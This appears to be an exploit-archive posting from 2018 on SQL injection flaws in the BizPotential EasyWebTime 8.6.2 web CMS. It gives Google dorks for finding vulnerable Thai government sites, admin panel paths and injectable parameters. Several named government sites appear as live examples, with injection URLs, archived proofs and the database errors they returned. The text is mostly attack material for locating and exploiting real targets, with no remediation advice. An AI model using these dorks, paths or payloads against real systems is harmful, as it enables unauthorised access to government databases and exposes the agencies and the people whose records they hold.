facebook facebook twitter rss

BizPotential EasyWebTime 8.6.2 Thailand Government SQL Injection Vulnerability

Author: KingSkrupellos , Published: 10-10-2018
# Exploit Title : BizPotential EasyWebTime 8.6.2 Thailand Government SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 10/09/2018
# Vendor Homepage : bizpotential.com ~ ewtadmin.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018090088

#################################################################################################

# Google Dorks :

inurl:''/ewtadmin/'' site:go.th

inurl:''/main.php?filename='' site:go.th

inurl:''/ewtadmin/ewt/ccs/''

intext:''© Copyright 2007 - BizPotential.com - All Rights Reserved.''

intext:''Copyright 2007 - BizPotential Co., Ltd. - All Rights Reserved''

#################################################################################################

# Admin Control Panel Paths =>

/ewtadmin/index.php
/ewtadmin82/
/ewtcommittee/index2331.php
/ewtadmin/ewt/DOMAINNAMEHERE_intranet/ewt_login.php

# SQL Injection Exploit :

/n_more3.php?page=[ID-NUMBER]&c_id=[SQL Injection]

/ewtadmin/ewt/[DOMAINNAME_web/n_more.php?c_id=[SQL Injection]

/more_news.php?offset=[SQL Injection]

/more_news.php?offset=-[ID-NUMBER]&cid=&startoffset=[SQL Injection]


#################################################################################################

# Webboard Exploit :

/ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1&filename=webboard

# Webboar Directory Path :

/ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard

ccs.DOMAINNAME.go.th/index_question.php?wcad=5&t=1&filename=webboard

#################################################################################################

# Example Site =>

Thailand Government Chachoengsao Cooperative Auditing Office

cad.go.th/ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1\%27&filename=webboard

cad.go.th/ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard

ccs.cad.go.th/index_question.php?wcad=5&t=1&filename=webboard

#################################################################################################

Thailand Government Department of Mineral Sources

# Example Sites =>

dmr.go.th/n_more3.php?page=0&c_id=199%27 => [ Proof of Concept ] =>

dmr.go.th/ewtadmin/ewt/dmr_web/n_more.php?c_id=556%27 => [ Proof of Concept ] => archive.is/bUcka

# SQL Database Error =>

SELECT * FROM article_list WHERE c_id = '199'' and n_approve = 'Y' ORDER BY n_date DESC LIMIT -20,20
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,20' at line 1

Thailand Government Office of Consumer Protection Board

# ocpb.go.th/more_news.php?offset=-30&cid=&startoffset=-10%27 => [ Proof of Concept ] => archive.is/inA3o

# SQL Database Error =>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-30, 10' at line 3

Thailand Government Ministry of Culture and Cooperatives - Auditing Department

# cad.go.th/cadweb_eng/ewt_w3c/more_news.php?offset=60%27 => [ Proof of Concept ] => archive.is/a4XYx

# SQL Database Error =>

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\WWW\ewtadmin\ewt\cadweb_eng\lib\function.php on line 101

SELECT * FROM article_list WHERE ( c_id = '' ) AND n_approve = 'Y' AND (('2561-09-10 05:57:13' between n_date_start and n_date_end)
or (n_date_start = '' and n_date_end = '')) ORDER BY n_date DESC,n_timestamp DESC LIMIT 60\\\',20
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\',20' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :